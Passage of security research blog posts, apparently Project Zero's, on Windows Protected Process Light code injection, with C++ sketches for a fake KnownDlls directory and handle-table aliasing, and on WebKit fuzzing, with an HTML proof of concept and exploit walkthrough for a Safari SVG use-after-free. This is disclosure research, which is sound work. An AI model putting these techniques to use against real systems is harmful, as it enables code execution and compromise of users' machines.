In my previous blog post I described a technique to elevate privileges from an arbitrary object directory creation vulnerability to SYSTEM by adding an entry into the KnownDlls directory and getting an arbitrary DLL loaded into a privileged process. I noted that this was also an administrator to PPL code injection as PPL will also load DLLs from the system’s KnownDlls location. As the code signing check is performed during section creation, not section mapping, as long as you can place an entry into KnownDlls you can load anything into a PPL, even unsigned code.
This doesn’t immediately seem that useful: we can’t write to KnownDlls without being an administrator, and even then not without some clever tricks. However, it’s worth looking at how a Known DLL is loaded to get an understanding of how it can be abused. Inside NTDLL’s loader (LDR) code is the following function to determine if there’s a preexisting Known DLL.
NTSTATUS LdrpFindKnownDll(PUNICODE_STRING DllName, HANDLE *SectionHandle) {
 // If KnownDll directory handle not open then return error.
 if (!LdrpKnownDllDirectoryHandle)
   return STATUS_DLL_NOT_FOUND;

 OBJECT_ATTRIBUTES ObjectAttributes;
 InitializeObjectAttributes(&ObjectAttributes,
   DllName,
   OBJ_CASE_INSENSITIVE,
   LdrpKnownDllDirectoryHandle,
   nullptr);

 return NtOpenSection(SectionHandle,
                      SECTION_ALL_ACCESS,
                      &ObjectAttributes);
}
The LdrpFindKnownDll function calls NtOpenSection to open the named section object for the Known DLL. It doesn’t open an absolute path; instead it uses the feature of the native system calls to specify a root directory for the object name lookup in the OBJECT_ATTRIBUTES structure. This root directory comes from the global variable LdrpKnownDllDirectoryHandle. Implementing the call this way allows the loader to only specify the filename (e.g. EXAMPLE.DLL) and not have to reconstruct the absolute path as the lookup will be relative to an existing directory. Chasing references to LdrpKnownDllDirectoryHandle we can find it’s initialized in LdrpInitializeProcess as follows:
NTSTATUS LdrpInitializeProcess() {
 // ...
 PPEB peb = // ...
 // If a full protected process don't use KnownDlls.
 if (peb->IsProtectedProcess && !peb->IsProtectedProcessLight) {
   LdrpKnownDllDirectoryHandle = nullptr;
 } else {
   OBJECT_ATTRIBUTES ObjectAttributes;
   UNICODE_STRING DirName;
   RtlInitUnicodeString(&DirName, L"\\KnownDlls");
   InitializeObjectAttributes(&ObjectAttributes,
                              &DirName,
                              OBJ_CASE_INSENSITIVE,
                              nullptr, nullptr);
   // Open KnownDlls directory.
   NtOpenDirectoryObject(&LdrpKnownDllDirectoryHandle,
                         DIRECTORY_QUERY | DIRECTORY_TRAVERSE,
                         &ObjectAttributes);
  }
}
This code shouldn’t be that unexpected: the implementation calls NtOpenDirectoryObject, passing the absolute path to the KnownDlls directory as the object name. The opened handle is stored in the LdrpKnownDllDirectoryHandle global variable for later use. It’s worth noting that this code checks the PEB to determine if the current process is a full protected process. Support for loading Known DLLs is disabled in full protected process mode, which is why even with administrator privileges and the clever trick I outlined in the last blog post we could only compromise PPL, not PP.
How does this knowledge help us? We can use our COM type confusion trick to write values into arbitrary memory locations instead of trying to hijack code execution, resulting in a data-only attack. As we can inherit any handles we like into the new PPL process, we can set up an object directory with a named section, then use the type confusion to change the value of LdrpKnownDllDirectoryHandle to the value of the inherited handle. If we induce a DLL load from System32 with a known name, the LDR will check our fake directory for the named section and map our unsigned code into memory, even calling DllMain for us. No need for injecting threads, ROP or bypassing CFG. A sketch of setting up such a fake KnownDlls directory follows.
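Here is a hedged sketch of that setup, with hand-declared native API prototypes; the names and details are mine and simplified:

#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")

// Prototypes not exposed in winternl.h, declared by hand.
extern "C" NTSTATUS NTAPI NtCreateDirectoryObject(
    PHANDLE DirectoryHandle, ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes);
extern "C" NTSTATUS NTAPI NtCreateSection(
    PHANDLE SectionHandle, ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes, PLARGE_INTEGER MaximumSize,
    ULONG SectionPageProtection, ULONG AllocationAttributes,
    HANDLE FileHandle);

#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)

// Build a private object directory holding an image section named like
// the DLL we expect the PPL to load. The signature level is recorded
// at section *creation*, in our unprotected process, not when the PPL
// later maps it.
HANDLE CreateFakeKnownDlls(const wchar_t* unsignedDllPath,
                           const wchar_t* dllName /* e.g. L"TARGET.DLL" */) {
  HANDLE hDir = nullptr, hSection = nullptr;
  OBJECT_ATTRIBUTES oa;
  UNICODE_STRING name;

  // Anonymous directory: we only need a handle to it, not a name.
  InitializeObjectAttributes(&oa, nullptr, 0, nullptr, nullptr);
  NtCreateDirectoryObject(&hDir, DIRECTORY_ALL_ACCESS, &oa);

  HANDLE hFile = CreateFileW(unsignedDllPath,
                             GENERIC_READ | GENERIC_EXECUTE,
                             FILE_SHARE_READ, nullptr, OPEN_EXISTING,
                             0, nullptr);

  RtlInitUnicodeString(&name, dllName);
  InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE, hDir,
                             nullptr);
  NtCreateSection(&hSection, SECTION_ALL_ACCESS, &oa, nullptr,
                  PAGE_EXECUTE, SEC_IMAGE, hFile);
  CloseHandle(hFile);
  return hDir;  // inherit this into the PPL and alias it (see below)
}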
All we need is a suitable primitive to write an arbitrary value. Unfortunately, while I could find methods which would cause an arbitrary write, I couldn’t sufficiently control the value being written. In the end I used the following interface and method, which is implemented on the object returned by ICorSvcBindToWorker::BindToRuntimeWorker.
interface ICorSvcPooledWorker : IUnknown {
   HRESULT CanReuseProcess(
           [in] OptimizationScenario scenario,
           [in] ICorSvcLogger* pCorSvcLogger,
           [out] long* pCanContinue);
};
In the implementation of CanReuseProcess the target value of pCanContinue is always initialized to 0. Therefore by replacing the [out] long* in the type library definition with [in] long we can get 0 written to any memory location we specify. By prefilling the lower 16 bits of the new process’ handle table with handles to a fake KnownDlls directory we can be sure of an alias between the real KnownDlls which will be opened once the process starts and our fake ones by just modifying the top 16 bits of the handle to 0. This is shown in the following diagram:

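A hedged sketch of the prefill step, assuming hFakeKnownDlls is a handle to our fake KnownDlls object directory; the duplicate count and the inheritance plumbing are simplified:

#include <windows.h>

// Windows hands out handle values as multiples of 4, so occupying the
// first 0x10000/4 slots means that for any real handle value H,
// (H & 0xFFFF) names one of our fakes once the top 16 bits are zeroed
// by the 32-bit write.
void PrefillHandleTable(HANDLE hFakeKnownDlls) {
  for (int i = 0; i < 0x10000 / 4; i++) {
    HANDLE dup = nullptr;
    DuplicateHandle(GetCurrentProcess(), hFakeKnownDlls,
                    GetCurrentProcess(), &dup,
                    0, TRUE /* inheritable */, DUPLICATE_SAME_ACCESS);
    // Keep every duplicate open so the low handle values stay occupied;
    // inheritable handles carry over into the spawned PPL process with
    // the same values.
  }
}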
Once we’ve overwritten the top 16 bits with 0 (the write is 32 bits but handles are 64 bits in 64-bit mode, so we won’t overwrite anything important) LdrpKnownDllDirectoryHandle now points to one of our fake KnownDlls handles. We can then easily induce a DLL load by sending a custom marshaled object to the same method and we’ll get arbitrary code execution inside the PPL.

Elevating to PPL-Windows TCB

We can’t stop here: attacking MSCORSVW only gets us PPL at the CodeGen signing level, not Windows TCB. Knowing that a fake cached signed DLL should load into a PPL, and that Microsoft left a backdoor for PPL processes at any signing level, I converted my C# code from Issue 1332 to C++ to generate a fake cached signed DLL. By abusing a DLL hijack in WERFAULTSECURE.EXE, which will run as PPL Windows TCB, we should get code execution at the desired signing level. This worked on Windows 10 1709 and earlier, however it didn’t work on 1803. Clearly Microsoft had changed the behavior of cached signing level in some way; perhaps they’d removed its trust in PPL entirely. That seemed unlikely as it would have a negative performance impact.
After discussing this a bit with Alex Ionescu I decided to put together a quick parser with information from Alex for the cached signing data on a file. This is exposed in NtObjectManager as the Get-NtCachedSigningLevel command. I ran this command against a fake signed binary and a system binary which was also cached signed and immediately noticed a difference:

For the fake signed file the Flags are set to TrustedSignature (0x02); however, for the system binary PowerShell couldn’t decode the enumeration and so just output the integer value of 66, which is 0x42 in hex. The value 0x40 was an extra flag on top of the original trusted signature flag. It seemed likely that without this flag set the DLL wouldn’t be loaded into a PPL process. Something must be setting this flag, so I decided to check what happened if I loaded a valid cached signed DLL without the extra flag into a PPL process. Monitoring it in Process Monitor I got my answer:

The Process Monitor trace shows that first the kernel queries for the Extended Attributes (EA) from the DLL. The cached signing level data is stored in the file’s EA so this is almost certainly an indication of the cached signing level being read. The full trace also shows artifacts of checking the full signature, such as enumerating catalog files; I’ve removed those artifacts from the screenshot for brevity. Finally the EA is set, and if I check the cached signing level of the file it now includes the extra flag. So setting the cached signing level is done automatically; the question is how? By pulling up the stack trace we can see how it happens:

Looking at the middle of the stack trace we can see the call to CipSetFileCache originates from the call to NtCreateSection. The kernel is automatically caching the signature when it makes sense to do so, e.g. in a PPL, so that subsequent image mappings don’t need to recheck the signature. It’s possible to map an image section from a file with write access, so we can reuse the same attack from Issue 1332, replace the call to NtSetCachedSigningLevel with NtCreateSection, and fake sign any DLL. It turned out that the call to set the file cache happened after the write check introduced to fix Issue 1332 and so it was possible to use this to bypass Device Guard again. For that reason I reported the bypass as Issue 1597, which was fixed in September 2018 as CVE-2018-8449. However, as with Issue 1332 the back door for PPL is still in place, so even though the fix eliminated the Device Guard bypass it can still be used to get us from PPL-CodeGen to PPL-WindowsTCB.

Conclusions

This blog showed how I was able to inject arbitrary code into a PPL without requiring administrator privileges. What could you do with this new found power? Actually not a great deal as a normal user, but there are some parts of the OS, such as the Windows Store, which rely on PPL to secure files and resources which you can’t modify as a normal user. If you elevate to administrator and then inject into a PPL you’ll get many more things to attack, such as CSRSS (through which you can certainly get kernel code execution) or Windows Defender which runs as PPL Anti-Malware. Over time I’m sure the majority of the use cases for PPL will be replaced with Virtual Secure Mode (VSM) and Isolated User Mode (IUM) applications, which have greater security guarantees and are also considered security boundaries that Microsoft will defend and fix.
Did I report these issues to Microsoft? Microsoft has made it clear that they will not fix issues only affecting PP and PPL in a security bulletin. Without a security bulletin the researcher receives no acknowledgement for the find, such as a CVE. The issue will not be fixed in current versions of Windows, although it might be fixed in the next major version. Previously, confirming Microsoft’s policy on fixing a particular security issue was based on precedent; however they’ve recently published a list of Windows technologies that will or will not be fixed in the Windows Security Service Criteria. As shown below for Protected Process Light, Microsoft will not fix or pay a bounty for issues relating to the feature. Therefore, from now on I will not be engaging Microsoft if I discover issues which I believe to only affect PP or PPL.

The one bug I reported to Microsoft was only fixed because it could be used to bypass Device Guard. When you think about it, only fixing for Device Guard is somewhat odd: I can still bypass Device Guard by injecting into a PPL and setting a cached signing level, and yet Microsoft won’t fix PPL issues but will fix Device Guard issues. Much as the Windows Security Service Criteria document really helps to clarify what Microsoft will and won’t fix, it’s still somewhat arbitrary. A secure feature is rarely secure in isolation; the feature is almost certainly secure because other features enable it to be so.
In part 2 of this blog we’ll go into how I was also able to break into Full PP-WindowsTCB processes using another interesting feature of COM.

365 Days Later: Finding and Exploiting Safari Bugs using Publicly Available Tools

Thu, 10/04/2018 - 12:40
Posted by Ivan Fratric, Google Project Zero
Around a year ago, we published the results of research about the resilience of modern browsers against DOM fuzzing, a well-known technique for finding browser bugs. Together with the bug statistics we also published Domato, our DOM fuzzing tool that was used to find those bugs.
Given that in the previous research, Apple Safari, or more specifically, WebKit (its DOM engine) did noticeably worse than other browsers, we decided to revisit it after a year using exactly the same methodology and exactly the same tools to see whether anything changed.
Test Setup
As in the original research, the fuzzing was initially done against WebKitGTK+ and then all the crashes were tested against Apple Safari running on a Mac. This makes the fuzzing setup easier as WebKitGTK+ uses the same DOM engine as Safari, but allows for fuzzing on a regular Linux machine. In this research, WebKitGTK+ version 2.20.2 was used, which can be downloaded here.
To improve the fuzzing process, a couple of custom changes were made to WebKitGTK+:
  • Made fixes to be able to build WebKitGTK+ with ASan (Address Sanitizer).

  • Changed window.alert() implementation to immediately call the garbage collector instead of displaying a message window. This works well because window.alert() is not something we would normally call during fuzzing.

  • Normally, when a DOM bug causes a crash, due to the multi-process nature of WebKit, only the web process would crash, but the main process would continue running. Code was added that monitors a web process and, if it crashes, the code would “crash” the main process with the same status.

  • Created a custom target binary.

After the previous research was published, we got a lot of questions about the details of our fuzzing setup. This is why, this time, we are publishing the changes made to the WebKitGTK+ code as well as the detailed build instructions below. A patch file can be found here. Note that the patch was made with WebKitGTK+ 2.20.2 and might not work as is on other versions.
Once WebKitGTK+ code was prepared, it was built with ASan by running the following commands from the WebKitGTK+ directory:
export CC=/usr/bin/clang
export CXX=/usr/bin/clang++
export CFLAGS="-fsanitize=address"
export CXXFLAGS="-fsanitize=address"
export LDFLAGS="-fsanitize=address"
export ASAN_OPTIONS="detect_leaks=0"

mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=. -DCMAKE_SKIP_RPATH=ON -DPORT=GTK -DLIB_INSTALL_DIR=./lib -DUSE_LIBHYPHEN=OFF -DENABLE_MINIBROWSER=ON -DUSE_SYSTEM_MALLOC=ON -DENABLE_GEOLOCATION=OFF -DENABLE_GTKDOC=OFF -DENABLE_INTROSPECTION=OFF -DENABLE_OPENGL=OFF -DENABLE_ACCELERATED_2D_CANVAS=OFF -DENABLE_CREDENTIAL_STORAGE=OFF -DENABLE_GAMEPAD_DEPRECATED=OFF -DENABLE_MEDIA_STREAM=OFF -DENABLE_WEB_RTC=OFF -DENABLE_PLUGIN_PROCESS_GTK2=OFF -DENABLE_SPELLCHECK=OFF -DENABLE_VIDEO=OFF -DENABLE_WEB_AUDIO=OFF -DUSE_LIBNOTIFY=OFF -DENABLE_SUBTLE_CRYPTO=OFF -DUSE_WOFF2=OFF -Wno-dev ..
make -j 4
mkdir -p libexec/webkit2gtk-4.0
cp bin/WebKit*Process libexec/webkit2gtk-4.0/
If you are doing this for the first time, the cmake/make step will likely complain about missing dependencies, which you will then have to install. You might note that a lot of features deemed not overly important for DOM fuzzing were disabled via -DENABLE flags. This was mainly to save us from having to install the corresponding dependencies but in some cases also to create a build that was more “portable”.
After the build completes, the fuzzing is as simple as creating a sample with Domato, running the target binary as
ASAN_OPTIONS=detect_leaks=0,exitcode=42 ASAN_SYMBOLIZER_PATH=/path/to/llvm-symbolizer LD_LIBRARY_PATH=./lib ./bin/webkitfuzz /path/to/sample <timeout>
and waiting for the exit code 42 (which, if you take a look at the command line above as well as the changes we made to the WebKitGTK+ code, indicates an ASan crash).
After collecting crashes, an ASan build of the most recent WebKit source code was created on the actual Mac hardware. This is as simple as running
./Tools/Scripts/set-webkit-configuration --release --asan
./Tools/Scripts/build-webkit
Each crash obtained on WebKitGTK+ was tested against the Mac build before reporting to Apple.
The Results
After running the fuzzer for 100,000,000 iterations (the same as a year ago) I ended up with 9 unique bugs that were reported to Apple. Last year, I estimated that the computational power to perform this number of iterations could be purchased for about $1000 and this probably hasn’t changed - an amount well within the reach of a wide range of attackers with varying motivations.
The bugs are summarized in the table below. Please note that all of the bugs have been fixed at the time of release of this blog post.
Project Zero bug ID  CVE            Type      Affected Safari 11.1.2  Older than 6 months  Older than 1 year
1593                 CVE-2018-4197  UAF       YES                     YES                  NO
1594                 CVE-2018-4318  UAF       NO                      NO                   NO
1595                 CVE-2018-4317  UAF       NO                      YES                  NO
1596                 CVE-2018-4314  UAF       YES                     YES                  NO
1602                 CVE-2018-4306  UAF       YES                     YES                  NO
1603                 CVE-2018-4312  UAF       NO                      NO                   NO
1604                 CVE-2018-4315  UAF       YES                     YES                  NO
1609                 CVE-2018-4323  UAF       YES                     YES                  NO
1610                 CVE-2018-4328  OOB read  YES                     YES                  YES

UAF = use-after-free. OOB = out-of-bounds
As can be seen in the table, out of the 9 bugs found, 6 affected the release version of Apple Safari, directly affecting Safari users.
While 9 or 6 bugs (depending how you count) is significantly less than the 17 found a year ago, it is still a respectable number of bugs, especially if we take into account that the fuzzer has been public for a long time now.
After the results were in, I looked into how long these bugs have been in the WebKit codebase. To check this, all the bugs were tested against a version of WebKitGTK+ that was more than 6 months old (WebKitGTK+ 2.19.6) as well as a version that was more than a year old (WebKitGTK+ 2.16.6).
The results are interesting - most of the bugs were sitting in the WebKit codebase for longer than 6 months, however, only 1 of them is older than 1 year. Here, it might be important to note that throughout the past year (between the previous and this blog post) I also did fuzzing runs using the same approach and reported 14 bugs. Unfortunately, it is impossible to know how many of those 14 bugs would have survived until now and how many would have been found in this fuzz run. It is also possible that some of the newly found bugs are actually older, but don’t trigger with the provided PoCs in the older versions due to unrelated code changes in the DOM. I didn’t investigate this possibility.
However, even if we assume that all of the previously reported bugs would not have survived until now, the results still indicate that (a) the security vulnerabilities keep getting introduced in the WebKit codebase and (b) many of those bugs get incorporated into the release products before they are caught by internal security efforts.
While (a) is not unusual for any piece of software that changes as rapidly as a DOM engine, (b) might indicate the need to put more computational resources into fuzzing and/or review before release.
The Exploit
To prove that bugs like this can indeed lead to a browser compromise, I decided to write an exploit for one of them. The goal was not to write a very reliable or sophisticated exploit - highly advanced attackers would likely not choose to use the bugs found by public tools, whose lifetime is expected to be relatively short. However, if someone with exploit writing skills were to use such a bug in, for example, a malware spreading campaign, they could potentially do a lot of damage even with an unreliable exploit.
Out of the 6 issues affecting the release version of Safari, I selected what I believed to be the easiest one to exploit—a use-after-free where, unlike in the other use-after-free issues found, the freed object is not on the isolated heap—a mitigation recently introduced in WebKit to make use-after-free exploitation harder.
Let us first start by examining the bug we’re going to exploit. The issue is a use-after-free in the SVGAnimateElementBase::resetAnimatedType() function. If you look at the code of the function, you are going to see that, first, the function gets a raw pointer to the SVGAnimatedTypeAnimator object on the line
   SVGAnimatedTypeAnimator* animator = ensureAnimator();
and, towards the end of the function, the animator object is used to obtain a pointer to a SVGAnimatedType object (unless one already exists) on the line
   m_animatedType = animator->constructFromString(baseValue);
The problem is that, in between these two lines, attacker-controlled JavaScript code could run. Specifically, this could happen during a call to computeCSSPropertyValue(). The JavaScript code could then cause SVGAnimateElementBase::resetAnimatedPropertyType() to be called, which would delete the animator object. Thus, the constructFromString() function would be called on the freed animator object - a typical use-after-free scenario, at least at first glance. There is a bit more to this bug though, but we’ll get to that later.
The vulnerability has been fixed in the latest Safari by no longer triggering JavaScript callbacks through computeCSSPropertyValue(). Instead, the event handler is going to be processed at some later time. The patch can be seen here.
A simple proof of concept for the vulnerability is:
<body onload="setTimeout(go, 100)">
  <svg id="svg">
    <animate id="animate" attributeName="fill" />
  </svg>
  <div id="inputParent" onfocusin="handler()">
    <input id="input">
  </div>
  <script>
    function handler() {
      animate.setAttribute('attributeName','fill');
    }
    function go() {
      input.autofocus = true;
      inputParent.after(inputParent);
      svg.setCurrentTime(1);
    }
  </script>
</body>
Here, svg.setCurrentTime() results in resetAnimatedType() being called, which in turn, due to DOM mutations made previously, causes a JavaScript event handler to be called. In the event handler, the animator object is deleted by resetting the attributeName attribute of the animate element.
Since constructFromString() is a virtual method of the SVGAnimatedType class, the primitive the vulnerability gives us is a virtual method call on a freed object.
In the days before ASLR, such a vulnerability would be immediately exploitable by replacing the freed object with data we control and faking the virtual method table of the freed object, so that when the virtual method is called, execution is redirected to the attacker’s ROP chain. But due to ASLR we won’t know the addresses of any executable modules in the process.
A classic way to overcome this is to combine such a use-after-free bug with an infoleak bug that can leak an address of one of the executable modules. But, there is a problem: In our crop of bugs, there wasn’t a good infoleak we could use for this purpose. A less masochistic vulnerability researcher would simply continue to run the fuzzer until a good infoleak bug would pop up. However, instead of finding better bugs, I deliberately wanted to limit myself to just the bugs found in the same number of iterations as in the previous research. As a consequence, the majority of time spent working on this exploit was to turn the bug into an infoleak.
As stated before, the primitive we have is a virtual method call on the freed object. Without an ASLR bypass, the only thing we can do with it that would not cause an immediate crash is to replace the freed object with another object that also has a vtable, so that when a virtual method is called, it is called on the other object. Most of the time, this would mean calling a valid virtual method on a valid object and nothing interesting would happen. However, there are several scenarios where doing this could lead to interesting results:
  1. The virtual method could be something dangerous to call out-of-context. For example, if we can call a destructor of some object, its members could get freed while the object itself continues to live. With this, we could turn the original use-after-free issue into another use-after-free issue, but possibly one that gives us a better exploitation primitive.

  2. Since constructFromString() takes a single parameter of the type String, we could potentially cause a type confusion on the input parameter if the other virtual method expects a parameter of another type. Additionally, if the other virtual method takes more parameters than constructFromString(), these would be uninitialized, which could also lead to exploitable behavior.

  3. As constructFromString() is expected to return a pointer of type SVGAnimatedType, if the other virtual method returns some other type, this will lead to a type confusion on the return value. Additionally, if the other virtual method does not return anything, then the return value remains uninitialized.

  4. If the vtables of the freed object and the object we replaced it with are of different sizes, calling a vtable pointer on the freed object could result in an out-of-bounds read on the vtable of the other object, resulting in calling a virtual function of some third class.

In this exploit we used option 3, but with a twist. To understand what the twist is, let’s examine the SVGAnimateElementBase class more closely: It implements (most of) the functionality of the SVG <animate> element. The SVG <animate> element is used to, as the name suggests, animate a property of another element. For example, having the following element in an SVG image
<animate attributeName="x" from="0" to="100" dur="10s" />
will cause the x coordinate of the target element (by default, the parent element) to grow from 0 to 100 over the duration of 10 seconds. We can use an <animate> element to animate various CSS or XML properties, which is controlled by the attributeName property of the <animate> element.
Here’s the interesting part: These properties can have different types. For example, we might use an <animate> element to animate the x coordinate of an element, which is of type SVGLengthValue (number + unit), or we might use it to animate the fill attribute, which is of type Color.
In an SVGAnimateElementBase class, the type of animated property is tracked via a member variable declared as
   AnimatedPropertyType m_animatedPropertyType;
Where AnimatedPropertyType is the enumeration of possible types. Two other member variables of note are
   std::unique_ptr<SVGAnimatedTypeAnimator> m_animator;
   std::unique_ptr<SVGAnimatedType> m_animatedType;
The m_animator here is the use-after-free object, while m_animatedType is the object created from the (possibly freed) m_animator.
SVGAnimatedTypeAnimator (type of m_animator) is a superclass which has subclasses for all possible values of AnimatedPropertyType, such as SVGAnimatedBooleanAnimator, SVGAnimatedColorAnimator etc. SVGAnimatedType (type of m_animatedType) is a variant that contains a type and a union of possible values depending on the type.
The important thing to note is that normally, both the subclass of m_animator and the type of m_animatedType are supposed to match m_animatedPropertyType. For example, if m_animatedPropertyType is AnimatedBoolean, then the type of m_animatedType variant should be the same, and m_animator should be an instance of SVGAnimatedBooleanAnimator.
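To make that invariant concrete, here is a rough, illustrative sketch (not WebKit's actual declarations) of the relationship between the tag and the union:

#include <cstdint>

enum AnimatedPropertyType { AnimatedBoolean, AnimatedColor, AnimatedLengthList };

struct SVGAnimatedTypeSketch {
  AnimatedPropertyType type;   // the tag...
  union {
    bool boolean;              // valid when type == AnimatedBoolean
    uint32_t color;            // stand-in for Color
    void* lengthList;          // stand-in for Vector<SVGLengthValue>*
  } value;                     // ...guards which arm of the union is live
};
// An animator for type B writing value as B while the tag says A is
// exactly the confusion exploited in the walkthrough below.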
After all, why shouldn’t all these types match, since m_animator is created based on m_animatedPropertyType here and m_animatedType is created by m_animator here. Oh wait, that’s exactly where the vulnerability occurs!
So instead of replacing a freed animator with something completely different and causing a type confusion between SVGAnimatedType and another class, we can instead replace the freed animator with another animator subclass and confuse SVGAnimatedType with type = A to another SVGAnimatedType with type = B.
But one interesting thing about this bug is that it would still be a bug even if the animator object did not get freed. In that case, the bug turns into a type confusion: to trigger it, one would simply change the m_animatedPropertyType of the <animate> element to a different type in the JavaScript callback (we’ll examine how this happens in detail later). This led to some discussion in the office about whether the bug should be called a use-after-free at all, or whether this is really a different type of bug where the use-after-free is merely a symptom.
Note that the animator object is always going to get freed as soon as the type of the <animate> element changes, which leads to an interesting scenario: to exploit the bug (whatever you choose to call it), instead of replacing the freed object with an object of another type, we could either replace it with an object of the same type or make sure it doesn’t get replaced at all. Due to how memory allocation in WebKit works, the latter is actually going to happen on its own most of the time anyway - objects allocated in a memory page will only start getting replaced once the whole page becomes full. Additionally, freeing an object in WebKit doesn’t corrupt it as would be the case in some other allocators, which allows us to still use it normally even after it has been freed.
Let’s now examine how this type confusion works and what effects it has:
  1. We start with an <animate> element for type A. m_animatedPropertyType, m_animator and m_animatedType all match type A.

  2. resetAnimatedType() gets called and it retrieves an animator pointer of type A here.

  3. resetAnimatedType() calls computeCSSPropertyValue() here, which triggers a JavaScript callback.

  4. In the JavaScript callback, we change the type of the <animate> element to B by changing its attributeName attribute. This causes SVGAnimateElementBase::resetAnimatedPropertyType() to be called. In it, m_animatedType and m_animator get deleted, while m_animatedPropertyType gets set to B according to the new attributeName here. Now, m_animatedType and m_animator are null, while m_animatedPropertyType is B.

  5. We return into resetAnimatedType(), where we still have a local variable animator which still points to the (freed but still functional) animator for type A.

  6. m_animatedType gets created based on the freed animator here. Now, m_animatedType is of type A, m_animatedPropertyType is B and m_animator is null.

  7. resetAnimatedType() returns, and the animator local variable pointing to the freed animator of type A gets lost, never to be seen again.

  8. Eventually, resetAnimatedType() gets called again. Since m_animator is still null, but m_animatedPropertyType is B, it creates m_animator of type B here.

  9. Since m_animatedType is non-null, instead of creating it anew, we just initialize it by calling m_animatedType->setValueAsString() here. We now have m_animatedPropertyType for type B, m_animator for type B and m_animatedType for type A.

  10. At some point, the value of the animated property gets calculated. That happens in SVGAnimateElementBase::calculateAnimatedValue() on this line by calling m_animator->calculateAnimatedValue(..., m_animatedType). Here, there is a mismatch between the m_animator (type B) and m_animatedType (type A). However, because the mismatch wouldn’t normally occur, the animator won’t check the type of the argument (there might be some debug asserts but nothing in the release build) and will attempt to write the calculated animated value of type B into the SVGAnimatedType with type A.

  11. After the animated value has been computed, it is read out as a string and set to the corresponding CSS property. This happens here.
The actual type confusion only happens in step 10: there, we write to the SVGAnimatedType of type A as if it were actually of type B. The rest of the interactions with m_animatedType are not dangerous, since they simply get and set the value as a string - an operation that is safe to do regardless of the actual type.
Note that, although the <animate> element supports animating XML properties as well as CSS properties, we can only do the above dance with CSS properties, as the code for handling XML properties is different. The list of CSS properties we can work with can be found here.
So, how do we exploit this type confusion for an infoleak? The initial idea was to use A = <some numeric type> and B = String. This way, when the type confusion on write occurs, a string pointer is written over a number, and we would then be able to read it in step 11 above. But there is a problem with this (as well as with a large number of other type combinations): the value read in step 11 must be a valid CSS property value in the context of the current animated property, otherwise it won’t be set correctly and we would not be able to read it out. For example, we were unable to find a string CSS property (from the list above) that would accept a value like 1.4e-45 or similar.
A more promising approach, given the limitations of step 11, is to replace a numeric type with another numeric type. We had some success with A = FloatRect and B = SVGLengthListValues, which is a vector of SVGLengthValue values. Like above, this results in a vector pointer being written over a FloatRect. This sometimes leads to successfully disclosing a heap address. Why sometimes? Because the only CSS property with type SVGLengthListValues we can use is stroke-dasharray, and stroke-dasharray accepts only positive values. Thus, if the lower 32 bits of the heap address we want to disclose look like a negative floating-point number (i.e. the highest bit is set), then we would not be able to disclose that address. This problem can be overcome by spraying the heap with 2GB of data so that the lower 32 bits of heap addresses start becoming positive. But since we need heap spraying anyway, there is another approach we can take.
The approach we actually ended up using is A = SVGLengthListValues (the stroke-dasharray CSS property) and B = float (the stroke-miterlimit CSS property). What this type confusion does is overwrite the lowest 32 bits of a pointer to an SVGLengthValue vector with a floating-point number.
Before we trigger this type confusion, we need to spray the heap with approximately 4GB of data (doable on modern computers), which gives us a good probability that when we change an original heap address 0x000000XXXXXXXXXX to 0x000000XXYYYYYYYY, the resulting address is still going to be a valid heap address, especially if YYYYYYYY is high. This way, we can disclose not-quite-arbitrary data at 0x000000XX00000000 + arbitrary offset.
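To make the partial overwrite concrete, here is a minimal standalone C sketch (illustration only, not exploit code; the pointer value is made up and a little-endian layout is assumed):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    uint64_t vector_ptr = 0x0000004512345678ULL; /* made-up vector pointer */
    float miterlimit = 123.5f;                   /* attacker-chosen stroke-miterlimit value */
    /* the confused write replaces only the low 32 bits (little-endian) */
    memcpy(&vector_ptr, &miterlimit, sizeof(miterlimit));
    /* prints 0x0000004542f70000 - high 32 bits preserved, low 32 bits controlled */
    printf("0x%016llx\n", (unsigned long long)vector_ptr);
    return 0;
}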
Why not-quite-arbitrary? Because there are still some limitations:
  1. As stroke-miterlimit must be positive, once again we can only disclose heap data that, interpreted as a 32-bit float, is positive.

  2. SVGLengthValue is a type that consists of a 32-bit float followed by an enumeration describing the units used (see the layout sketch after this list). When an SVGLengthValue is read out as a string in step 11 above, if the unit value is valid, it will be appended to the number (e.g. ‘100px’). If we attempt to set a string like that to the stroke-miterlimit property, it will fail. Thus, the byte following the heap value we want to read must decode as an invalid unit (in which case the unit is not appended when reading out the SVGLengthValue as a string).

Note that both of these limitations can often be worked around by doing non-aligned reads.
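As a rough sketch of the layout assumed above (field names are illustrative; this is not WebKit's actual definition), the byte that follows the leaked 32-bit value decides whether a unit suffix gets appended on readout:

#include <stdint.h>

/* illustrative layout only */
struct svg_length_value_sketch {
    float   value;     /* read out as the number in the stroke-dasharray string */
    uint8_t unit_type; /* if this decodes as a valid unit, a suffix like "px" is
                          appended and the value can't be fed to stroke-miterlimit */
};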
Now that we have our more-or-less usable read, what do we read out? As the whole point is to defeat ASLR, we should read a pointer into an executable module. Often in exploitation, one would do that by reading out the vtable pointer of some object on the heap. However, on macOS it appears that vtable pointers point into a separate memory region from the one containing the executable code of the corresponding module. So instead of reading out a vtable pointer, we need to read a function pointer instead.
What we ended up doing is using VTTRegion objects in our heap spray. A VTTRegion object contains a Timer, which contains a pointer to a Function object which (in this case) contains a function pointer to VTTRegion::scrollTimerFired(). Thus, we can spray with VTTRegion objects (which takes about 10 seconds on a not-quite-state-of-the-art Mac Mini) and then scan the resulting memory for a function pointer.
This gives us the ASLR bypass, but one other thing useful to have for the next phase is the address of the payload (ROP chain and shellcode). We disclose it by the following steps:
  1. Find a VTTRegion object in the heap spray.

  2. By setting the VTTRegion.height property during the heap spray to an index in the spray array, we can identify exactly which of the millions of VTTRegion objects we just read.

  3. Set the VTTRegion.id property of the VTTRegion object to the payload.

  4. Read out the VTTRegion.id pointer.

We are now ready to trigger the vulnerability a second time, this time for code execution. This is the classic use-after-free exploitation scenario: we overwrite the freed SVGAnimatedTypeAnimator object with data we control.
